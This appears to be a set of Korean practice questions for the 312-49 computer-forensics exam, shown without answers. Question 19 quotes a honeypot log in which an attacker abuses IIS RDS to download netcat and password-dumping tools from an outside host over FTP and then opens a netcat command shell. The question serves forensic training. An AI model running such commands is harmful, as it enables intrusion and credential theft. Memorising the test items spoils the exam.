312-49 문제 16

CEH 시험에 합격한 캐롤은 자신의 네트워크가 완벽하게 안전한지 확인하고 싶었습니다. 그래서 DMZ, 스테이트풀 방화벽, NAT, IPSEC, 패킷 필터링 방화벽을 구현했습니다. 모든 보안 조치를 취했음에도 불구하고, 네트워크의 어떤 호스트도 인터넷에 접속할 수 없었습니다. 그 이유는 무엇일까요?

312-49 문제 17

Windows XP 부팅 마지막 단계에서 로그인 대화 상자를 초기화하기 위해 처리되는 파일은 무엇입니까?

312-49 문제 18

증거물로 압수하려는 컴퓨터의 모든 케이블 연결 상태를 기록해 두어야 하는 이유는 무엇일까요?

312-49 문제 19

다음 발췌문은 lab.wiretrip.net에서 호스팅된 허니팟 로그에서 가져온 것입니다. Snort는 213.116.251.162 IP 주소에서 유니코드 공격이 발생했다고 보고했습니다. 파일 권한 정규화 취약점(유니코드 공격)을 이용하면 일반적으로 스크립트 실행 권한이 없는 임의의 폴더에서도 스크립트를 실행할 수 있습니다. 공격자는 유니코드 공격을 시도하여 결국 boot.ini 파일을 표시하는 데 성공했습니다.
그다음 공격자는 msadcs.dll을 통해 RDS를 악용하는 단계로 넘어갑니다. RDS 취약점을 이용하면 악의적인 사용자가 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행하는 SQL 문을 구성할 수 있습니다. 공격자는 간단한 쿼리를 통해 디렉터리가 존재하는지 확인하고, msadcs.dll에 대한 쿼리를 통해 해당 파일이 정상적으로 작동하는 것을 확인합니다. 이어서 공격자는 RDS 쿼리를 실행하고, 그 결과 아래와 같이 명령이 실행됩니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 취약점을 통해 무엇을 추론할 수 있습니까?

312-49 문제 20

스미스는 법의학 조사 임무의 일환으로 휴대전화를 압수했습니다. 그는 휴대전화에서 가입자 식별 모듈(SIM 카드) 데이터를 복구하라는 지시를 받았습니다. 스미스는 SIM 카드가 개인 식별 번호(PIN)로 보호되어 있다는 것을 알았지만, 사람들이 일반적으로 PIN 번호를 기본값으로 두거나 1234와 같이 쉽게 추측할 수 있는 숫자를 사용한다는 사실도 알고 있었습니다. 그는 세 번의 시도 끝에 PIN 번호를 재설정했지만 SIM 카드가 차단되었습니다. 이 상황에서 제이슨이 PIN 번호를 재설정하고 SIM 카드 데이터에 접근하려면 어떻게 해야 할까요?